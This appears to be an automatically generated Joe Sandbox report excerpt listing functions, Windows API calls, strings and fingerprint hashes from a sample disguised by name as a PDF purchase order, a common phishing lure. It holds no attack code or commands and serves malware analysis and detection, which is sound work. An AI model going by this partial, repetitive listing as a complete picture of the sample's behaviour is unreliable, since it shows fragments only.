                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                                                                                                            • API String ID: 3300687185-3887548279
                                                                                                                                                                                                                                                                                                            • Opcode ID: 695c293b5c08b16f47da31665f3c405faf95951031de7ad37065d401655dd0ad
                                                                                                                                                                                                                                                                                                            • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 695c293b5c08b16f47da31665f3c405faf95951031de7ad37065d401655dd0ad
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                                                                                                                                                                                                                                                            Function 0045E41B Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 0045E4D9
                                                                                                                                                                                                                                                                                                            • _printf.LIBCMT ref: 0045E595
                                                                                                                                                                                                                                                                                                            • _printf.LIBCMT ref: 0045E5B7
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                                                                                                                                                                                                                                                            • API String ID: 3590180749-2894483878
                                                                                                                                                                                                                                                                                                            • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                                                                                                                                                                                                            • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                                                                                                                                                                                                                                                            Function 0046F90E Relevance: 21.1, APIs: 14, Instructions: 147windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0046F950
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0046FA68
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3412594756-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                                                                                                                                                                                                            • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                                                                                                                                                                                                                                                            Function 0045D971 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 140COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                                            • API String ID: 4013263488-4113822522
                                                                                                                                                                                                                                                                                                            • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                                                                                                                                                                                                            • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                                                                                                                                                                                                                                                            Function 00435A35 Relevance: 21.1, APIs: 14, Instructions: 136timeCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 228034949-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                                                                                                                                                                                                                            • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                                                                                                                                                                                                                                                            Function 004334CA Relevance: 21.1, APIs: 14, Instructions: 132filecommemoryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                                                                                                                                                                                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                                                                                                                                                                                                                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00433603
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3969911579-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                                                                                                                                                                                                            • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                                                                                                                                                                                                                                                            Function 00445A77 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 73windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 00445A8D
                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00445AC4
                                                                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00445AE0
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                                            • API String ID: 3125838495-3381328864
                                                                                                                                                                                                                                                                                                            • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                                                                                                                                                                                                            • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                                                                                                                                                                                                                                                            Function 00479921 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 314COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CopyVariant$ErrorLast
                                                                                                                                                                                                                                                                                                            • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                            • API String ID: 2286883814-4206948668
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                                                                                                                                                                                                            • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                                                                                                                                                                                                                                                            Function 00475D8B Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 194COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00475F18
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                                                                                                                                                                                                                                                            • API String ID: 3052893215-4176887700
                                                                                                                                                                                                                                                                                                            • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                                                                                                                                                                                                            • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                                                                                                                                                                                                                                                            Function 004582BF Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 165registryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32 ref: 004583E8
